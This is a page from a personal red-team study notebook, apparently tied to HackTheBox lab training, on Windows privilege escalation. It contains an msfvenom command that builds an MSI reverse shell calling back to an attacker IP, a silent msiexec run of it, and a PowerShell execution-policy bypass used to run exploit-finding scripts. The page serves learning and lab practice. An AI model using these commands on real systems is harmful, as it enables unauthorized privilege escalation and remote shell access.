🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  • Abuse Always Install Elevated Settings
  • Exploit suggester
  • Windows desktop
  • Windows Server
  1. Red Teaming
  2. Priv Escalation
  3. Windows Priv Escalation

Others Techniques

Abuse Always Install Elevated Settings

Enum

PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

hoặc

PS C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

Tạo MSI package để exploit

endy21@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes

Thực thi

C:\htb> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Exploit suggester

Windows desktop

Với Window Desktop có thể chay windows-exploit-suggester.py để auto recon

Cài dependencies

endy21@htb[/htb]$ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
endy21@htb[/htb]$ sudo tar -xf setuptools-2.0.tar.gz
endy21@htb[/htb]$ cd setuptools-2.0/
endy21@htb[/htb]$ sudo python2.7 setup.py install

endy21@htb[/htb]$ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
endy21@htb[/htb]$ sudo tar -xf xlrd-1.0.0.tar.gz
endy21@htb[/htb]$ cd xlrd-1.0.0/
endy21@htb[/htb]$ sudo python2.7 setup.py install

Lấy thông tin hệ thống

C:\htb> systeminfo

Host Name:                 WINLPE-WIN7
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          mrb3n
Registered Organization:
Product ID:                00371-222-9819843-86644
Original Install Date:     3/25/2021, 7:23:47 PM
System Boot Time:          5/13/2021, 5:14:12 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows

<SNIP>

Chạy tool

endy21@htb[/htb]$ sudo python2.7 windows-exploit-suggester.py --update

endy21@htb[/htb]$ python2.7 windows-exploit-suggester.py  --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt

Windows Server

Với Windown Server có thể chạy Sherlock.ps1 để check

PS C:\htb> Set-ExecutionPolicy bypass -Scope process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution
policy?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y


PS C:\htb> Import-Module .\Sherlock.ps1
PS C:\htb> Find-AllVulns

PreviousCredential TheftNextLinux Priv Escalation

Last updated 1 month ago

🥷
🪟